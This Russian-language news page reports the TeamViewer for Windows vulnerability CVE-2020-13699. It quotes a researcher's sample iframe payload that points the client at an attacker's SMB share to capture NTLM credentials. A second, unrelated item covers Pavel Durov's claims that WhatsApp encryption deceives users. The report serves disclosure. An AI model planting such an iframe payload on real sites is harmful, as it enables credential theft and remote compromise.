Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

Дуров назвал шифрование WhatsApp крупнейшим обманом пользователей

Основатель Telegram Павел Дуров жёстко высказался в адрес WhatsApp (принадлежит корпорации Meta, признанной экстремисткой и запрещённой в России), заявив, что разговоры о защищённости переписки в этом мессенджере — не более чем иллюзия. По его словам, функция шифрования в WhatsApp может оказаться «самым крупным мошенничеством в отношении потребителей в истории».

Об этом Дуров написал в своём телеграм-канале. Он заявил, что миллиарды пользователей якобы введены в заблуждение обещаниями полной конфиденциальности.

По его версии, несмотря на публичные заявления о защите сообщений, WhatsApp читает переписку пользователей и передаёт данные третьим сторонам.

 

На этом фоне Дуров отдельно подчеркнул позицию Telegram. По его словам, сервис никогда не позволял себе читать личные сообщения пользователей и не собирается делать этого в будущем. Он заверил, что для Telegram конфиденциальность переписки остаётся принципиальным вопросом.

Кроме того, основатель мессенджера сравнил подходы двух платформ к защите данных. По его мнению, Telegram использует более жёсткие правила в этой сфере, что помогает лучше защищать личную информацию и снижать риск утечек.

Напомним, на днях Дуров связал критику Telegram с попытками усилить цензуру и контроль в ЕС.

RSS: Новости на портале Anti-Malware.ru